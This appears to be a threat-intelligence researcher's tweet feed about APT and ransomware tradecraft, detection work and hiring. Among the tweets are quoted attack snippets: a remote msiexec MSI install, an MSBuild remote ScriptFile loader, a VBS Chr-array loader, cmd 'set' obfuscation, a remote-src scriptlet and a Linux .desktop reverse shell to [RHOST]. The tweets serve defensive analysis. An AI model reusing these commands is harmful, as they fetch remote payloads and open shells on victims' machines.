i’m legit amped about aligning with all of the “tip of the spear” teams under the CISO
this part of the public “secure futures” update is a pretty nice acknowledgment of threat intel impact
let’s go! come join us:
🕵️
👻
🆕 Job Update: I'm joining @Microsoft!
On the #MSTIC R&D team:
☁️🏹 hunting & investigations in the cloud (#AzureSentinel, @Office365)
🎯✍️🏽writing detections for several platforms
👥🎁community-based research & sharing
🛡️🤲🏽protecting those who need it the most
#DefendingDemocracy
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover?
Start here: 🤩
But then what?? Let’s talk about some post-compromise techniques...
We found the full CARBANAK source code & previously unseen plugins.
Our #FLARE team spent 500 hours analyzing the 100,000+ lines of code.
@mykill & @jtbennettjr just dropped day 1 of their 4-part blog series:
Source code linked in blog.
#CarbanakWeek
🦈💳
How most ransomware incidents actually work 🔻
Access brokers sell access to compromised networks to ransomware-as-a-service affiliates, who conduct the intrusions.
Ransomware-as-a-service affiliates prioritize targets based on intended impact or perceived profit
Intrusion…
Mandiant's protection & containment strategies (direct link: ) give insight into methods observed and defenses that have worked against interactive, post-compromise deployment of ransomware.
@cglyer & I have covered this extortion trend on #StateOfTheHack
Kudos to the quiet hero who patiently reconstructed this evidence from RDP bitmap cache. It proved Human Machine Interface (HMI) access that was central to the DHS/ICS-CERT reporting, attributed to RU gov.
Most good #DFIR stories are based on hours of difficult & thankless work.
OK so this is my last week at @Mandiant / @FireEye 😢
Here's the truth:
♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me
🧠 Many of the brilliant minds in security are here & we have FUN every day
1/8
Official statement on the root cause of the Hawaii inbound ballistic missile threat alert: “Someone clicked the wrong thing on the computer."
Everyone in infosec nods.
Fresh APT loader technique for today's #DailyScriptlet:
cs=Array(#,#,#,#,...): cmd="": For each c in cs: cmd=cmd&Chr(c): Next: cmd=cmd&vbcrlf: Execute(cmd)
This is remotely loaded into memory from source phishing doc that uses renamed wscript & pubprn.vbs to load COM Scriptlet.
Attackers can check your security visibility faster than you can configure it.
Here's an UNC group we track 😉 using Outlook home page (CVE-2017-11774) to check the target's attack surface and process creation & PowerShell event visibility - then sending it to domain-fronted C2.
1. Attackers abuse Pastebin to host payloads.
2. Some security teams abuse Pastebin APIs to keep up with them.
Glad they’ve finally put a stop to... *checks notes* the second one? 🙃
@MrJamesHemmings API access is still available - . The Scraping API has been discontinued due to active abuse by third parties for commercial purposes; such activity is prohibited by our current T&C’s, please see Section C, P.4.
Blog post by @OsandaMalith / @m3g9tr0n:
• covers creative NetNTLM/SMBRelay attack techniques - including regsvr32 🤪
• exemplifies the value of curiosity in security research
• has me questioning some other processes that make network connections...
On the @FireEye Advanced Practices Team, we're interested in targeted attackers using Outlook Homepage shell & persistence, made accessible by @sensepost's ruler:
There are VERY few of them detected & publicly-uploaded. Here's one:
What if you could magically rank strings based on their maliciousness?
Now you can: 🧙♂️
We open sourced #StringSifter today at @DerbyCon.
Built for the blue team, probably useful for red 😉
📺 WATCH @phtully @iAmThePr0blem's talk:
"Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness." - Sun Tzu
...
"Nah, bro I'm good." - this red teamer [pictured]
Please enable Network Level Authentication (NLA) for a layer of pre-auth before a connection is established.
This not only reduces the terrifying #DejaBlue & #BlueKeep RDP attack surface, it's also a top ransomware protection recommendation from @Mandiant:
👉🏼 “Federal investigators may be unable to readily distinguish between criminals and innocent parties engaged in intelligence gathering. Consequently, it is possible that individuals engaged in legitimate cybersecurity may become the subject of a criminal investigation.” - DOJ
One-click MS Access database code execution by @424f424f: 💥
Static VT detection at 0/59.
I expect some dynamic engines will fail to launch this properly as well.
We’re hiring for our cyber crime / counter-ransomware intelligence mission.
Senior analyst position, some details flexible.
I promise you we are working on globally unique and important capabilities.
🔨A Tough Outlook for Home Page Attacks
🔗
Blog has #APT33 🇮🇷, #APT34 🇮🇷, and #UNC1194 🏴😉 home page persistence & RCE.
🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide!
😱Cool TTPs (pictured)
#GuardrailsOfTheGalaxy
Yesterday we said an early goodbye to our awesome dog Rocket.
Not just a sweet family dog – he had 12 years on the front lines:
• lap-warming through many late night intrusions
• had been in a SCIF 🙃
• co-authored good blogs & all bad tweets
Much love to all the cyber pets!
New blog! This is one of my favorite adversary tradecraft write-ups this year:
It's cool to see case studies written from the attacker's perspective, exploring intrusion choices made.
@cglyer & I plan to have author @ramen0x3f on the next #StateOfTheHack!
"Our approach to domain fronting within Azure is a great example of how the ever-changing dynamics of our world have prompted us to re-examine an important and complicated issue — and ultimately make a change."
👉
Let the data speak & reduce attack surface.
Well that's certainly one way to launch mshta! 🧐
Please enjoy this "tasteful" cmd.exe obfuscation before @danielhbohannon melts minds in exactly 24 hours with #DOSfuscation at Black Hat Asia.
Malicious CSV 🔥 uploaded today. h/t @TekDefense
0/56 on VT:
🪙 On #GoldenSAML remediation:
• Rotate the token-signing AD FS certificate in rapid succession twice
👉If only rotated once, a copy of the previous [compromised?] certificate will still be resident in Azure AD, and can still be used to forge SAML tokens
Critical new defenses for OAuth consent phishing:
• ✅ Publisher verification [pic 1]
• 📋 Customizable app consent policies [pic 2]
• 🚷 Globally disallowing user consent to new multi-tenant apps from unverified publishers (on Nov 8)
👉🏼📰 Details:
Say hello to Fedir Hladyr 👋
The senior sys admin at #FIN7's original front company, Combi Security.
He maintained their internal HipChat instance for malware & payment card sharing - and tracked the team's intrusion projects in JIRA.
He puts the "organized" in organized crime.
Good morning. ☕️
Let's try something new.
> wmic process call create
> wmic path win32_process call create
If you share a novel* method to launch a process via wmic – without "process "+"call "+"create " – I will DM you a personal $10 Amazon gift card, up to $100 total today.
I led the first Mandiant incident response engagement into an unknown financial actor that eventually became FIN7. Later discovered the CARBANAK source code.
But today I got to hang with the REAL heroes from FBI Seattle who brought justice
😅 @ W perp walking his perp walk photo
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission:
I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
MSTIC is looking for Senior Security Researchers (Malware Reverse Engineers) in the US and Australia to join our MSTIC-RE team. This is an exciting opportunity to make a tangible difference in combating Nation State (NS/APT/DHA) and ransomware threats.
🚨💪💪🚨
“Today we took action to disrupt... #Trickbot, one of the world’s most infamous botnets and prolific distributors of #ransomware.”
🆕 legal approach: “Our case includes copyright claims against Trickbot’s malicious use of our software code”
🔗⤵️
In honor of the @Mandiant rebrand and the kick-off of #CyberDefenseSummit (MIRcon) – I bring to you this important piece of security conference history:
Video is now public for the first time 😂
@cyb3rops @anthomsec Not the most technically impressive, but one of the more brazen moves was a nation state threat actor using the compromised account of the lead security person to reply-all to multiple email threads about the potential incident - telling everyone to stand down
We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs:
#MSTIC and Defender threat intel collab ➕ #DART 👻 incident response team experience from the trenches [1/3]
@sixdub @malcomvetter @InvokeThreatGuy APT29 HAMMERTOSS did all the things
1. Hosted malz on compromised infra
2. Replaced wermgr.exe - awesome persistence!
3. Algorithm for new Twitter handle daily for APT29 control
4. Additional workweek cmds via GitHub steganography
5. Exfil to cloud storage
Reminder to check all your #PowerPoint slides. Some have hyperlink mouseover launch of remote MSI payload stored on @discordapp
msiexec /i hxxps://cdn.discordapp[.]com/attachments/448418688190775298/455878026576789511/rak.msi /q
💾 "Faktura.ppsx" (2/60):
Found a super spicy 🌶️ take on an #IQY file (launched by Excel) while going through my file collections today.
• 0 static VT detections.
• Creative embedded payload & remote launcher.
...turns out it's my coworker @MrUn1k0d3r and he's released a POC:
It's been awesome to witness so many teams collaborating to prevent/detect malicious OAuth apps and reduce the attack surface.
Excited for my small part in providing #AzureSentinel visibility into suspicious OAuth behavior & tooling. Blog soon!
🙏PwnAuth, O365-attack-toolkit, C3
#APT32 phishing - now with more #TweeTPs
Windows.csproj & .mp4 downloaded with certutil
MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService"
Payload loaded in memory then deleted from disk
New approaches used by #OceanLotus #APT group, that leverage a macro to load code hidden in the table by minimal white font and execute the downloaded payload through MSBUILD.exe. Either AES or RC4 is used for decryption.
url: hxxp://139.59.30.109:8090/abcv
Stopped using PowerShell for attacks?
Seems to be working just fine for #APT32 🇻🇳
lang.ps1 uploaded yesterday (3/56):
I appreciate their signature obfuscation style (pictured)
The underlying backdoor here is very creative... [1/2]
When our awesome #MSTIC Russia team discovered this event unfolding in real-time 🤯, here was our crime triage on how DEV-0586's destructive malware differs from 𝘵𝘺𝘱𝘪𝘤𝘢𝘭 human-operated ransomware.
"Ransom" note in the blog: - anything we missed?
Microsoft identified a unique destructive malware operated by an actor tracked as DEV-0586 targeting Ukrainian organizations. Observed activity, TTPs, and IOCs shared in this new MSTIC blog. We'll update the blog as our investigation unfolds.
In this guide from Checkpoint, they highlight some default sandbox values that payload developers check for [username check pictured]
I’ve long argued that these make for great home computer user/host names – some extra security layers never hurt 😉
Disrupted a cross-cloud BEC campaign impacting hundreds of victims. Here’s a behind-the-scenes look at their custom tools & techniques
There’s tons more happening to disrupt cyber crime – credit for this particular write-up goes to my coauthor @Stefan0x531
Hopefully federal agencies deemed their blue teams "mission essential."
The last #shutdown provided unprecedented network signal-to-noise baselining and resulted in several teams detecting new incidents. It also helped scope a large gov IR by isolating the beaconing servers.
I decided to make my own minimalist #DailyScriptlet with... a remote payload!
I've also trimmed the fat (XML definition, script language tag, etc)
112 characters:
<scriptlet>
<registration progid="☺">
<script src=""></script>
</registration>
</scriptlet>
"No engines detected this file" 😒
Let's change that:
^apply this #yara rule to unzipped OOXML contents as well!
Pictured: "alpha.docx" @VirusTotal (0/60):
Technique by @enigma0x3:
#OAuth techniques are trending again.
Pictured: the time I wrote OAuth app abuse Snort rules and they actually caught the #APT28 🐻 2016 Russian election interference in-the-wild! [note the date 😉]
Sometimes attackers have more to say – don't forget to check your phishing documents for comments.
#DFIR
In-the-wild [red team] sample this week using character substitution + bitsadmin transfer + csc.exe + .Automation.dll + schtasks 👍🏽
@0rbz_ @Hexacorn PoC: ready, set SET
Because apparently setting environment variables can be done with environment variables!
set ♫=set
Example 1:
%♫% ☺=pow^er&&%♫% ☻=she^ll
%☺%%☻%
Example 2:
%♫% ♥=e^r
pow%♥%sh%♥:r=ll%
🆕 🔥 Research on PDB Paths from @stvemillertime:
#DFIR primer & exploration of these wonderful artifacts.
Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov.
THREAD (1/n)
APT32 loves living off the land.
They copy & rename legit binaries with their initial phish's macros.
🆕 macro method this week, heavy on VBS arrays, persists:
C:\ProgramData\ErroLogon.exe //E:vbscript /b C:\ProgramData\Error.log
Analyzed with @a_tweeter_user #AdversaryMethods
Fun fact: the WMI EventFilter registered by this #DailyScriptlet for persistence leverages TargetInstance.SystemUptime to specify a launch time range (in seconds).
For malware, the range is often chosen to allow the system to fully boot then launch once.
Method in Vault 7 leak.
How about a #DailyScriptlet with spicy VBS obfuscation using split, eval, and chr arithmetic
Launches:
1⃣ Metasploit-style shellcode
2⃣ Registry persistent remote mshta
3⃣ WMI persistent #squiblydoo [pictured] cc: @cglyer
"reg9.sct" uploaded this week:
🚨 Coordinated Global DNS Record Manipulation Campaign
@CyberAmyntas shares in-the-wild TTPs [pictured]
@bread08 shows connection to #Iran 🇮🇷
We're still scoping a LARGE amount of activity.
After you 2FA your domain administration portal, read the blog:
Come work with us on the core threat intelligence team: “The Microsoft Threat Intelligence Center (MSTIC) is recruiting experienced nation-state threat hunters – with highly honed threat intelligence analysis skills.”
LFG:
Please DM me if we have worked…
So I started watching Hawkeye as an escape from work. Only to find out it’s *also* about a bunch of Eastern European criminals in tracksuits with ties to fake security companies
Two-factor authentication:
1⃣Something you know
+
2⃣Something y̶o̶u̶ ̶h̶a̶v̶e̶
your kids are playing with 📱
while you try to finish this one thing
but now you can't do it
In light of the #FIN7 "Combi Security" DOJ indictment, we've released our massive technical post and indicator release:
We reveal new information from @Mandiant IRs about the extent of FIN7's crimes, their innovative techniques, & how to find them today.
Just knocked out the Scranton Half Marathon in some classic PA weather (35 degrees, pouring rain throughout) 🌧🏃🏻♂️
Still managed to get a personal record
1:43:03 @ 7:52 pace 🎉
thanks to a training plan from @BeWellDianna
If you like to break down malicious scripts, I can't recommend @GCHQ's #CyberChef enough.
You can also create reusable recipes for auto-extraction & decoding of popular encoding techniques.
Example: extracting shellcode from a metasploit-style PowerShell payload
#DailyScriptlet
Yes! #APT29 🇷🇺 invented this afaik in 2014 when we saw it first-hand (#NoEasyBreach).
The key here is it gives timestomping capabilities. Bad guy specifies timestamps within the XML, schtasks applies them. So you can hijack/overwrite existing named scheduled tasks & be a ghost 👻
Pretty cool combination of techniques in the wild:
• External relationship linked within XML with "soap:wsdl=" syntax
• Many layers of encoding including PowerShell in VBE
Uploaded an hour ago, VT Detection: 6/61:
Certutil execution of malicious Base64 content used by APT29 since at least 2014.
@mattifestation (or @subTee?) found/popularized the remote certutil method, loved by APT34/OilRig and many others.
Our teammate @stvemillertime shows how to watch your network for it. #dailypcap
Attackers still use .IQY file extensions to execute code with Excel.
It's a bit clunky on execution, but is super lightweight and easy to use multiple stage payloads. 🤷🏻♂️
Here's a sample using @pastebin uploaded 15 minutes ago to VT (0/55): CC: @ScumBots
I know SO many of you have had intense 2020s – but let me just tell you, I’m hitting with the heavyweights over here 🥴🥊
You cannot imagine the number of life changing events.
I don’t say that to diminish what you’re going through... it’s more that I’m walking with you. ✊🏼
If you want to contribute on a fun team with great data
getting to ground truth on intrusions 🕵️ – especially in the cloud 😶🌫️ –
Microsoft's Detection and Response Team (#DART 👻) is hiring: #DFIR
... also their swag game is on point 🎯👌
Malicious shortcuts - not just for Windows anymore?
On Linux, drop any code into a .desktop file:
[Desktop Entry]
Name=Emacs
Exec=/bin/bash -i >& /dev/tcp/[RHOST]/[RPORT] 0>&1
Icon=
Terminal=false
Type=Application
#NoShortcuts
[1/2]